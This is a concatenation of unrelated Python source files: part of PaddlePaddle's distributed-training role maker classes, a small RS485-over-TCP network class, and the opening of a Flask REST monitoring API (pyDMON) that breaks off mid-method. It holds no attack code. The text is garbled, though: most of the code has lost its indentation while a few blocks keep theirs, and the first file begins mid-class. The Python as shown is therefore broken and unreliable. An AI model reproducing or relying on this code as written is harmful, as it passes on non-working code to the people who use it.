raise NotImplementedError("Please implement this method in child class")
def _is_server(self):
"""
return is_server() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_first_worker(self):
"""
Check whether the node is the first instance of worker.
Returns:
bool: True if this is the first node of worker,
False if not.
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_num(self):
"""
Get current total worker number.
Returns:
int: worker number
"""
raise NotImplementedError("Please implement this method in child class")
def _server_num(self):
"""
Get current total server number.
Returns:
int: server number
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_index(self):
"""
Get current worker id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _server_index(self):
"""
Get current server id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _role_id(self):
"""
Get current id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _node_num(self):
"""
Get the training node number
Returns:
int: node num
"""
raise NotImplementedError("Please implement this method in child class")
def _get_trainer_endpoints(self):
"""
return trainer endpoints
"""
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
return pserver endpoints
"""
return self._server_endpoints
def to_string(self):
return "role: {}, current_id: {}, worker_endpoints: {}, server_endpoints: {}".format(
self._role, self._current_id, self._worker_endpoints,
self._server_endpoints)
def _all_gather(self, input, comm_world="worker"):
print("warning: RoleMakerBase does not have all gather worker.")
return None
def _all_reduce(self, input, mode="sum", comm_world="worker"):
"""
Args:
input(list/numpy.array): array of one dim
output(list/numpy.array): array of one dim
mode(str): "sum" or "min" or "max"
"""
print("warning: RoleMakerBase does not have all reduce worker.")
return None
def _barrier(self, comm_world):
"""
barrier between trainers if current role is TRAINER
"""
print("warning: RoleMakerBase does not have barrier worker.")
def _is_heter_worker(self):
"""
Return is_heter_worker() of current process
"""
warnings.warn("RoleMakerBase does not have function: _is_heter_worker.")
return False
def _heter_worker_num(self):
"""
Get current total heter-worker number.
Returns:
int: heter_worker number
"""
warnings.warn(
"RoleMakerBase does not have function: _heter_worker_num.")
return 0
def _get_heter_worker_endpoints(self):
"""
Returns:
            string: all heter_trainers' endpoints
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints
def _get_heter_worker_endpoint(self):
"""
Returns:
int: corresponding heter_trainer's endpoint
            e.g. with 4 cpu-trainers (default) and 2 gpu-trainers (heter),
            cpu-trainers No.0 and No.2 work with gpu-trainer No.0,
            and cpu-trainers No.1 and No.3 work with gpu-trainer No.1
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints[(self._current_id) %
self._heter_worker_num()]
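# A minimal sketch of a concrete role maker built on RoleMakerBase, as the class
# docstring above suggests. This single-process variant is illustrative only and
# is not used anywhere in this module.
class _SingleProcessRoleMaker(RoleMakerBase):
    def _is_worker(self):
        return True

    def _is_server(self):
        return False

    def _is_first_worker(self):
        return True

    def _worker_num(self):
        return 1

    def _server_num(self):
        return 0

    def _worker_index(self):
        return 0

    def _server_index(self):
        return 0

    def _role_id(self):
        return 0

    def _node_num(self):
        return 1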
class PaddleCloudRoleMaker(RoleMakerBase):
def __init__(self, is_collective=False, **kwargs):
super(PaddleCloudRoleMaker, self).__init__()
self._is_collective = is_collective
self._non_distributed = False
self._kwargs = kwargs
self._role_is_generated = False
self._server_endpoints = []
self._worker_endpoints = []
self._gloo = Gloo() # gloo instance
def _barrier(self, comm_world):
self._gloo.barrier(comm_world)
def _all_gather(self, input, comm_world="worker"):
return self._gloo.all_gather(input, comm_world)
def _all_reduce(self, input, mode="sum", comm_world="worker"):
return self._gloo.all_reduce(input, mode, comm_world)
def _is_worker(self):
"""
whether current process is worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER
def _is_server(self):
"""
whether current process is server
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.SERVER
def _is_first_worker(self):
"""
whether current process is worker of rank 0
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER and self._current_id == 0
def _worker_index(self):
"""
get index of current worker
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _server_index(self):
"""
get index of current server
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _role_id(self):
"""
get index of current node
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _worker_num(self):
"""
        return the current number of workers
"""
if not self._role_is_generated:
self._generate_role()
return self._trainers_num
def _server_num(self):
"""
return the current number of server
"""
if not self._role_is_generated:
self._generate_role()
return len(self._get_pserver_endpoints(
)) if self._get_pserver_endpoints() is not None else 0
def _node_num(self):
"""
return the training node number
"""
if not self._role_is_generated:
self._generate_role()
return self._nodes_num
def _get_trainer_endpoints(self):
"""
get endpoint of all trainers
"""
if not self._role_is_generated:
self._generate_role()
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
get endpoint of all pservers
"""
if not self._role_is_generated:
self._generate_role()
return self._server_endpoints
def _is_non_distributed(self):
"""
        Return True if the environment variables required by fleetrun are not found
        (i.e. the fleet code was launched directly with python)
"""
if not self._role_is_generated:
self._generate_role()
return self._non_distributed
def _heter_worker_num(self):
"""
get heter worker nums
"""
if not self._role_is_generated:
self._generate_role()
return self._heter_trainers_num
def _is_heter_worker(self):
"""
whether current process is heter worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.HETER_WORKER
def _ps_env(self):
# Environment variable PADDLE_PSERVERS_IP_PORT_LIST must be set
# format: string(ip:port,ip:port), eg. 127.0.0.1:6001,127.0.0.1:6002
self._server_endpoints = os.getenv("PADDLE_PSERVERS_IP_PORT_LIST", None)
if self._server_endpoints is None:
# back to non_distributed execution.
self._server_endpoints = ""
self._trainers_num = 1
self._role = Role.WORKER
self._current_id = 0
self._nodes_num = 1
self._heter_trainers_num = 0
self._heter_trainer_endpoints = None
self._non_distributed = True
return
self._server_endpoints = self._server_endpoints.split(",")
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS", None)
if self._worker_endpoints != None:
self._worker_endpoints = self._worker_endpoints.split(",")
else:
self._worker_endpoints = []
trainers_num = os.getenv("PADDLE_TRAINERS_NUM", None)
if trainers_num == None:
raise ValueError(
"Can not find PADDLE_TRAINERS_NUM, please check your environment."
)
trainers_num = int(trainers_num)
training_role = os.getenv("TRAINING_ROLE", None)
if training_role == None:
raise ValueError(
"Can not find TRAINING_ROLE, please check your environment.")
if training_role not in ["TRAINER", "PSERVER", "HETER_TRAINER"]:
raise ValueError(
"TRAINING_ROLE must be PSERVER or TRAINER or HETER_TRAINER, but get {}, please check your environment.".
format(training_role))
# For heter parameter server env setting
heter_trainer_eplist = os.getenv("PADDLE_HETER_TRAINER_IP_PORT_LIST",
"")
if heter_trainer_eplist != "":
try:
heter_trainer_eplist = os.environ[
"PADDLE_HETER_TRAINER_IP_PORT_LIST"].split(",")
except:
raise ValueError(
"Can not Find PADDLE_HETER_TRAINER_IP_PORT_LIST in env or its format doesn't match the requirement: 'IP:PORT,IP:PORT' ."
)
self._is_heter_parameter_server_mode = True
heter_trainers_num = len(heter_trainer_eplist)
else:
self._is_heter_parameter_server_mode = False
heter_trainers_num = 0
if training_role == "TRAINER":
role = Role.WORKER
current_id = os.getenv("PADDLE_TRAINER_ID", None)
if current_id == None:
raise ValueError(
"Can not find PADDLE_TRAINER_ID, please check your environment."
)
current_id = int(current_id)
if len(self._worker_endpoints) > 0:
self._cur_endpoint = self._worker_endpoints[current_id]
elif training_role == "PSERVER":
role = Role.SERVER
port = os.getenv("PADDLE_PORT", None)
if port == None:
raise ValueError(
"Can not find PADDLE_PORT, please check your environment.")
ip = os.getenv("POD_IP", None)
if ip == None:
raise ValueError(
"Can not find POD_IP, please check your environment.")
self._cur_endpoint = ip + ":" + port
current_id = self._server_endpoints.index(self._cur_endpoint)
elif training_role == "HETER_TRAINER":
role = Role.HETER_WORKER
cur_port = os.getenv("PADDLE_PORT", None)
if cur_port == None:
raise ValueError(
"Can not find PADDLE_PORT, please check your environment.")
cur_ip = os.getenv("POD_IP", None)
if cur_ip == None:
raise ValueError(
"Can not find POD_IP, please check your environment.")
curr_endpoint = ":".join([cur_ip, cur_port])
current_id = heter_trainer_eplist.index(curr_endpoint)
self._trainers_num = trainers_num
self._role = role
self._current_id = current_id
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
self._heter_trainers_num = heter_trainers_num
self._heter_trainer_endpoints = heter_trainer_eplist
def _collective_env(self):
self._current_id = int(os.getenv("PADDLE_TRAINER_ID", "0"))
self._training_role = os.getenv("PADDLE_TRAINING_ROLE", "TRAINER")
assert (self._training_role == "TRAINER")
self._role = Role.WORKER
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS")
self._cur_endpoint = os.getenv("PADDLE_CURRENT_ENDPOINT")
if self._worker_endpoints is None:
# back to non_distributed execution.
self._worker_endpoints = "127.0.0.1:6170"
self._cur_endpoint = self._worker_endpoints
self._non_distributed = True
self._worker_endpoints = self._worker_endpoints.split(",")
self._trainers_num = len(self._worker_endpoints)
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _gloo_init(self):
# PADDLE_WITH_GLOO 1: trainer barrier, 2: all barrier
use_gloo = int(os.getenv("PADDLE_WITH_GLOO", "0"))
if use_gloo not in [1, 2]:
return
# PADDLE_GLOO_RENDEZVOUS 1: HDFS 2: FILE 3: HTTP
rendezvous_type = int(os.getenv("PADDLE_GLOO_RENDEZVOUS", "0"))
prefix = os.getenv("SYS_JOB_ID", "")
if rendezvous_type not in [
Gloo.RENDEZVOUS.HDFS, Gloo.RENDEZVOUS.HTTP, Gloo.RENDEZVOUS.FILE
]:
raise ValueError(self._gloo._err_type)
need_init_all = True if use_gloo == 2 else False
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
dfs_name = os.getenv("PADDLE_GLOO_FS_NAME", "")
dfs_ugi = os.getenv("PADDLE_GLOO_FS_UGI", "")
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.name": dfs_name,
"dfs.ugi": dfs_ugi,
"dfs.path": dfs_path,
"store.prefix": prefix,
}
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
start_http_server = False
manager = Manager()
http_server_d = manager.dict()
http_server_d["running"] = False
if self._is_collective:
ep_rank_0 = self._worker_endpoints[0]
if self._is_first_worker():
start_http_server = True
else:
ep_rank_0 = os.getenv("PADDLE_GLOO_HTTP_ENDPOINT", "")
if self._is_server() and self._server_index() == 0:
start_http_server = True
ip, port = ep_rank_0.split(':')
kwargs = {
"http.host": ip,
"http.port": port,
"store.prefix": prefix,
'start_http_server': start_http_server,
'http_server_d': http_server_d,
}
else:
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.path": dfs_path,
"store.prefix": prefix,
}
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
type = "HDFS"
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
type = "HTTP"
else:
type = "FILE"
print("Gloo init with {}: need_init_all: {}, args: {}".format(
type, need_init_all, kwargs))
self._gloo.init(
rendezvous=rendezvous_type,
role=self._role,
role_id=self._role_id(),
worker_num=self._worker_num(),
server_num=self._server_num(),
need_init_all=need_init_all,
kwargs=kwargs)
if rendezvous_type == Gloo.RENDEZVOUS.HTTP:
http_server_d['running'] = False
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._ps_env()
else:
self._collective_env()
self._role_is_generated = True
if not paddle.fluid.framework.in_dygraph_mode():
self._gloo_init()
class UserDefinedRoleMaker(PaddleCloudRoleMaker):
def __init__(self, is_collective=False, init_gloo=False, **kwargs):
super(UserDefinedRoleMaker, self).__init__(
is_collective=is_collective, init_gloo=init_gloo, **kwargs)
self._init_gloo = init_gloo
def _user_defined_ps_env(self):
self._server_endpoints = self._kwargs.get("server_endpoints")
self._worker_endpoints = self._kwargs.get("worker_endpoints", [])
self._trainers_num = self._kwargs.get("worker_num", 0)
if self._trainers_num == 0:
assert (len(self._worker_endpoints) > 0)
self._trainers_num = len(self._worker_endpoints)
self._role = self._kwargs.get("role")
self._current_id = self._kwargs.get("current_id")
if self._role == Role.WORKER and len(
self._worker_endpoints) > self._current_id:
self._cur_endpoint = self._worker_endpoints[self._current_id]
elif self._role == Role.SERVER:
self._cur_endpoint = self._server_endpoints[self._current_id]
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _user_defined_collective_env(self):
self._worker_endpoints = self._kwargs.get("worker_endpoints")
self._current_id = self._kwargs.get("current_id")
self._trainers_num = len(self._worker_endpoints)
self._training_role = Role.WORKER
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._user_defined_ps_env()
else:
self._user_defined_collective_env()
self._role_is_generated = True
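# A minimal sketch (values are placeholders) of the environment variables a
# non-collective PaddleCloudRoleMaker reads in _ps_env() and _gloo_init() above;
# the helper name is illustrative and not part of this module's API.
def _example_ps_trainer_env():
    os.environ["TRAINING_ROLE"] = "TRAINER"
    os.environ["PADDLE_TRAINER_ID"] = "0"
    os.environ["PADDLE_TRAINERS_NUM"] = "2"
    os.environ["PADDLE_TRAINER_ENDPOINTS"] = "127.0.0.1:6170,127.0.0.1:6171"
    os.environ["PADDLE_PSERVERS_IP_PORT_LIST"] = "127.0.0.1:6001,127.0.0.1:6002"
    os.environ["PADDLE_WITH_GLOO"] = "1"        # 1: trainer barrier, 2: all barrier
    os.environ["PADDLE_GLOO_RENDEZVOUS"] = "2"  # 1: HDFS, 2: FILE, 3: HTTP
    os.environ["PADDLE_GLOO_FS_PATH"] = "/tmp/gloo_rendezvous"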
|
network.py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Kevin Schlosser
import socket
import threading
from . import rs485
class Network(object):
def __init__(self, ip, port):
self.ip = ip
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((ip, port))
self.rs485 = rs485.RS485(self)
self.rs485.start()
self._read_event = threading.Event()
self._read_thread = threading.Thread(target=self._read_loop)
self._read_thread.daemon = True
self._read_thread.start()
def recv(self):
pass
def send(self):
pass
def _read_loop(self):
# this will actually loop forever or until the program is stopped.
# a packet is always returned.
for packet in self.rs485:
packet.message_type.send(packet)
def write(self, packet):
self.rs485.write(packet)
def stop(self):
self.rs485.stop()
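# Usage sketch (the host, port and packet below are placeholders): open the
# connection, let the background reader dispatch incoming packets via
# packet.message_type.send(), and shut the bus down when finished.
#
#   net = Network("192.168.1.50", 8899)
#   net.write(packet)   # packet objects come from the rs485 layer
#   net.stop()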
|
pyDMON.py
|
"""
Copyright 2015, Institute e-Austria, Timisoara, Romania
http://www.ieat.ro/
Developers:
* Gabriel Iuhasz, iuhasz.gabriel@info.uvt.ro
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
#!flask/bin/python
from flask.ext.restplus import Api, Resource, fields
from flask import Flask, jsonify
from flask import request
from flask import redirect
from flask import make_response
from flask import abort
from flask import url_for
from flask import render_template
from flask import Response
from flask import send_file
from flask import send_from_directory
from flask import copy_current_request_context
import os
import sys
import signal
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
import jinja2
import requests
import shutil
# from werkzeug import secure_filename #unused
from urlparse import urlparse
# DICE Imports
from pyESController import *
from pysshCore import *
from dmonPerfMon import *
from app import *
from pyUtil import *
# from threadRequest import *
from greenletThreads import *
# import Queue
# from threading import Thread
import tempfile
import requests
import psutil
from logging.handlers import RotatingFileHandler
import time
from datetime import datetime
import glob
import multiprocessing
#from threadRequest import getStormLogs
from artifactRepository import *
import uuid
from dmonasyncquery import asyncQuery
# directory Location
outDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'output')
tmpDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')
cfgDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'conf')
baseDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'db')
pidDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'pid')
logDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'logs')
credDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'keys')
tempDir = tempfile.gettempdir()
esDir = '/opt/elasticsearch'
lsCDir = '/etc/logstash/conf.d/'
gbgProcessList = []
# D-Mon Supported frameworks
lFrameworks = ['hdfs', 'yarn', 'spark', 'storm', 'cassandra', 'mongodb', 'cep']
# app = Flask("D-MON")
# api = Api(app, version='0.2.0', title='DICE MONitoring API',
# description='RESTful API for the DICE Monitoring Platform (D-MON)',
# )
# changes the descriptor on the Swagger WUI and appends to api /dmon and then /v1
# dmon = api.namespace('dmon', description='D-MON operations')
#Initialize detect service
servDet = DetectBDService()
# argument parser
dmonAux = api.parser()
dmonAux.add_argument('redeploy', type=str, required=False,
help='Redeploys configuration of Auxiliary components on the specified node.')
dmonAuxAll = api.parser()
dmonAuxAll.add_argument('redeploy-all', type=str, required=False,
help='Redeploys configuration of Auxiliary components on all nodes.')
# pQueryES.add_argument('task',type=str, required=True, help='The task details', location='form')
# descripes universal json @api.marshal_with for return or @api.expect for payload model
queryES = api.model('query details Model', {
'fname': fields.String(required=False, default="output", description='Name of output file.'),
'size': fields.Integer(required=True, default=500, description='Number of record'),
'ordering': fields.String(required=True, default='desc', description='Ordering of records'),
    'queryString': fields.String(required=True, default="host:\"dice.cdh5.s4.internal\" AND serviceType:\"dfs\"",
                                 description='Elasticsearch Query'),
'tstart': fields.Integer(required=True, default="now-1d", description='Start Date'),
'tstop': fields.Integer(required=False, default="None", description='Stop Date'),
'metrics': fields.List(fields.String(required=False, default=' ', description='Desired Metrics')),
'index': fields.String(required=False, default='logstash-*', description='Name of ES Core index')
})
queryESEnhanced = api.model('aggregated query details Model', {
'fname': fields.String(required=False, default="output", description='Name of output file.'),
'interval': fields.String(required=False, default="10s", description='Aggregation interval.'),
'size': fields.Integer(required=True, default=0, description='Number of record'),
'tstart': fields.Integer(required=True, default="now-1d", description='Start Date'),
'tstop': fields.Integer(required=False, default="now", description='Stop Date'),
'aggregation': fields.String(required=False, default="system", description='Aggregation'),
'index': fields.String(required=False, default='logstash-*', description='Name of ES Core index')
})
#Nested ENhanced JSON input
dDMONQueryEnh = api.model('queryESEnh Model', {
'DMON':fields.Nested(queryESEnhanced, description="Query details")
})
# Nested JSON input
dMONQuery = api.model('queryES Model', {
'DMON': fields.Nested(queryES, description="Query details")
})
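# A request body matching the nested dMONQuery model above looks like this
# (values roughly follow the field defaults declared in queryES):
#
# {
#   "DMON": {
#     "fname": "output",
#     "size": 500,
#     "ordering": "desc",
#     "queryString": "host:\"dice.cdh5.s4.internal\" AND serviceType:\"dfs\"",
#     "tstart": "now-1d",
#     "tstop": "None",
#     "metrics": [],
#     "index": "logstash-*"
#   }
# }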
nodeSubmitCont = api.model('Submit Node Model Info', {
'NodeName': fields.String(required=True, description="Node FQDN"),
'NodeIP': fields.String(required=True, description="Node IP"),
'NodeOS': fields.String(required=False, description="Node OS"),
'key': fields.String(required=False, description="Node Pubilc key"),
'username': fields.String(required=False, description="Node User Name"),
'password': fields.String(required=False, description="Node Password"),
'LogstashInstance': fields.String(required=False, description='Logstash Server Endpoint')
})
nodeDelList = api.model('Delete node list', {
'Nodes': fields.List(fields.String(required=True, default='node_name', description='Node FQDN'))
})
nodeSubmit = api.model('Submit Node Model', {
'Nodes': fields.List(fields.Nested(nodeSubmitCont, required=True, description="Submit Node details"))
})
esCore = api.model('Submit ES conf', {
'HostFQDN': fields.String(required=True, description='Host FQDN'),
'IP': fields.String(required=True, description='Host IP'),
'OS': fields.String(required=False, default='unknown', description='Host OS'),
'NodeName': fields.String(required=True, description='ES Host Name'),
'NodePort': fields.Integer(required=False, default=9200, description='ES Port'),
    'ESClusterName': fields.String(required=True, description='ES Cluster Name'),
'ESCoreHeap': fields.String(required=False, default='4g', description='ES Heap size'),
'MasterNode': fields.Boolean(required=False, description='ES Master'),
'DataNode': fields.Boolean(required=False, description='ES Data'),
'NumOfShards': fields.Integer(required=False, default=1, description='Number of shards'),
'NumOfReplicas': fields.Integer(required=False, default=0, description='Number of replicas'),
'FieldDataCacheSize': fields.String(required=False, default='20%', description='Field cache size'),
'FieldDataCacheExpires': fields.String(required=False, default='6h', description='Field cache expiration'),
'FieldDataCacheFilterSize': fields.String(required=False, default='20%', description='Field cache filter size'),
'FieldDataCacheFilterExpires': fields.String(required=False, default='6h',
description='Field cache filter expiration'),
'IndexBufferSize': fields.String(required=False, default='30%', description='Index buffer size'),
'MinShardIndexBufferSize': fields.String(required=False, default='12mb', description='Min Shard index buffer size'),
'MinIndexBufferSize': fields.String(required=False, default='96mb', description='Min index buffer size'),
'ESCoreDebug': fields.Boolean(required=False, default=1, description='Debug logs')
})
kbCore = api.model('Submit KB conf', {
'HostFQDN': fields.String(required=True, description='Host FQDN'),
'IP': fields.String(required=True, description='Host IP'),
'OS': fields.String(required=False, default='unknown', description='Host OS'),
'KBPort': fields.Integer(required=False, default=5601, description='KB Port'),
})
nodeUpdate = api.model('Update Node Model Info', {
'IP': fields.String(required=True, description="Node IP"),
'OS': fields.String(required=False, description="Node OS"),
'Key': fields.String(required=False, description="Node Public key"),
'User': fields.String(required=False, description="Node User Name"),
'Password': fields.String(required=False, description="Node Password"),
'LogstashInstance': fields.String(required=False, description='Logstash Server Endpoint')
})
nodeRoles = api.model('Update Node Role Model Info', {
'Roles': fields.List(fields.String(required=True, default='yarn', description='Node Roles'))
})
listNodesRolesInternal = api.model('Update List Node Role Model Info Nested', {
"NodeName": fields.String(required=True, description="Node FQDN"),
"Roles": fields.List(fields.String(required=True, default='yarn', description='Node Roles'))
})
listNodeRoles = api.model('Update List Node Role Model Info', {
"Nodes": fields.List(
fields.Nested(listNodesRolesInternal, required=True, description='List of nodes and their roles'))
})
lsCore = api.model('Submit LS conf', {
'HostFQDN': fields.String(required=True, description='Host FQDN'),
'IP': fields.String(required=True, description='Host IP'),
'OS': fields.String(required=False, description='Host OS'),
'LPort': fields.Integer(required=False, default=5000, description='Lumberjack port'),
    'udpPort': fields.String(required=False, default='25826', description='UDP Collectd Port'),
'LSCoreHeap': fields.String(required=False, default='512m', description='Heap size for LS server'),
'LSCoreWorkers': fields.String(required=False, default='4', description='Number of workers for LS server'),
'ESClusterName': fields.String(required=True, default='diceMonit', description='ES cluster name'),
# TODO: use as foreign key same as ClusterName in esCore
'LSCoreStormEndpoint': fields.String(required=False, default='None', description='Storm REST Endpoint'),
'LSCoreStormPort': fields.String(required=False, default='None', description='Storm REST Port'),
'LSCoreStormTopology': fields.String(required=False, default='None', description='Storm Topology ID'),
'LSCoreSparkEndpoint': fields.String(required=False, default='None', description='Spark REST Endpoint'),
'LSCoreSparkPort': fields.String(required=False, default='None', description='Spark REST Port'),
'Index': fields.String(required=False, default='logstash', description='ES index name to be used')
})
# monNodes = api.model('Monitored Nodes',{
# 'Node':fields.List(fields.Nested(nodeDet, description="FQDN and IP of nodes"))
# })
# nodeDet = api.model('Node Info',{
# 'FQDN' : field
# })#[{'FQDN':'IP'}]
certModel = api.model('Update Cert', {
'Certificate': fields.String(required=False, description='Certificate')
})
resInterval = api.model('Polling interval', {
'Spark': fields.String(required=False, default='15', description='Polling period for Spark metrics'),
'Storm': fields.String(required=False, default='60', description='Polling period for Storm metrics'),
'System': fields.String(required=False, default='15', description='Polling period for System metrics'),
'YARN': fields.String(required=False, default='15', description='Polling period for YARN metrics')
})
yarnHistorySettings = api.model('Settings for Yarn history server', {
'NodeIP': fields.String(required=False, default='127.0.0.1', description='History Server IP'),
'NodePort': fields.Integer(required=False, default=19888, description='History Server Port'),
    'Polling': fields.String(required=False, default='30', description='History Server Polling Period')
})
mongoDBConf = api.model('Settings for MongoDB', {
'MongoHost': fields.String(required=True, default='127.0.0.1', description='MongoDB Host'),
'MongoPort': fields.String(required=True, default='27017', description='MongoDB Port'),
'MongoUser': fields.String(required=False, default='', description='MongoDB User'),
    'MongoPassword': fields.String(required=False, default='', description='MongoDB Password'),
'MongoDBs': fields.String(required=False, default='admin', description='MongoDBs')
})
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(baseDir, 'dmon.db')
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
db.create_all()
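# The routes below expose the controller log and the read-only observer resources
# (registered applications, monitored nodes and the metrics query interfaces).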
@dmon.route('/v1/log')
class DmonLog(Resource):
def get(self):
try:
logfile = open(os.path.join(logDir, 'dmon-controller.log'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
return response
return Response(logfile, status=200, mimetype='text/plain')
@dmon.route('/v1/observer/applications')
class ObsApplications(Resource):
def get(self):
qApps = db.session.query(dbApp.appName, dbApp.appVersion, dbApp.startTime, dbApp.stopTime, dbApp.jobID).all()
appDict = {}
for a in qApps:
appDict[a[0]] = {'ver': a[1], 'start': a[2], 'stop': a[3], 'status': a[4]}
response = jsonify(appDict)
response.status_code = 200
return response
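# Returns registration details (version, start/stop time and status) for a single application.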
@dmon.route('/v1/observer/applications/<appID>')
@api.doc(params={'appID': 'Application identification'})
class ObsAppbyID(Resource):
def get(self, appID):
qApp = dbApp.query.filter_by(appName=appID).first()
if qApp is None:
response = jsonify({'Status': 'Warning', 'Message': appID + ' not registered'})
response.status_code = 404
            app.logger.warning('[%s] : [WARN] Application %s is not registered',
                               datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), appID)
return response
        # TODO: sync with dev branch to add missing code
response = jsonify({qApp.appName: {'ver': qApp.appVersion, 'start': qApp.startTime, 'stop': qApp.stopTime, 'status': qApp.jobID}})
response.status_code = 200
return response
@dmon.route('/v1/observer/nodes')
class NodesMonitored(Resource):
# @api.marshal_with(monNodes) # this is for response
def get(self):
nodeList = []
nodesAll = db.session.query(dbNodes.nodeFQDN, dbNodes.nodeIP).all()
if nodesAll is None:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
for nl in nodesAll:
nodeDict = {}
app.logger.info('[%s] : [INFO] Nodes - > %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nl[0]))
# print >> sys.stderr, nl[0]
nodeDict.update({nl[0]: nl[1]})
nodeList.append(nodeDict)
response = jsonify({'Nodes': nodeList})
response.status_code = 200
app.logger.info('[%s] : [INFO] Node list is: %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeList))
return response
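# Per-node status: returns the registered IP, OS, monitored flag and assigned Logstash instance.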
@dmon.route('/v1/observer/nodes/<nodeFQDN>')
@api.doc(params={'nodeFQDN': 'Nodes FQDN'})
class NodeStatus(Resource):
def get(self, nodeFQDN):
qNode = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qNode is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found!'})
response.status_code = 404
app.logger.warn('[%s] : [WARN] Node %s not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeFQDN))
return response
else:
response = jsonify({nodeFQDN: {
'Status': qNode.nStatus,
'IP': qNode.nodeIP,
'Monitored': qNode.nMonitored,
'OS': qNode.nodeOS,
'LSInstance': qNode.nLogstashInstance
}})
response.status_code = 200
app.logger.info('[%s] : [INFO] Node info -> Status:%s, IP:%s, Monitored:%s, OS:%s, LSInstance: %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qNode.nStatus,
qNode.nodeIP, qNode.nMonitored, qNode.nodeOS, qNode.nLogstashInstance)
return response
@dmon.route('/v1/observer/nodes/<nodeFQDN>/roles')
@api.doc(params={'nodeFQDN': 'Nodes FQDN'})
class NodeStatusServices(Resource):
    def get(self, nodeFQDN):
        qNode = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
        if qNode is None:
            response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found!'})
            response.status_code = 404
            app.logger.warning('[%s] : [WARN] Node %s not found',
                               datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeFQDN))
            return response
        if qNode.nRoles == 'unknown':
            response = jsonify({'Status': 'No known service on ' + nodeFQDN})
            response.status_code = 200
            app.logger.warning('[%s] : [WARN] No known service on %s',
                               datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeFQDN))
            return response
else:
roleList = qNode.nRoles
response = jsonify({'Roles': roleList.split()})
response.status_code = 200
app.logger.info('[%s] : [INFO] Node roles %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(roleList.split()))
return response
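# /v1 query endpoint: builds an ES query from the DMON payload and returns the result
# as csv, json, plain text or OSLC (only system metrics are supported for OSLC output).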
@dmon.route('/v1/observer/query/<ftype>')
@api.doc(params={'ftype': 'Output type'})
class QueryEsCore(Resource):
# @api.doc(parser=pQueryES) #inst parser
# @api.marshal_with(dMONQuery) # this is for response
@api.expect(dMONQuery) # this is for payload
def post(self, ftype):
# args = pQueryES.parse_args()#parsing query arguments in URI
supportType = ["csv", "json", "plain", "oslc"]
if ftype not in supportType:
response = jsonify({'Supported types': supportType, "Submitted Type": ftype})
response.status_code = 415
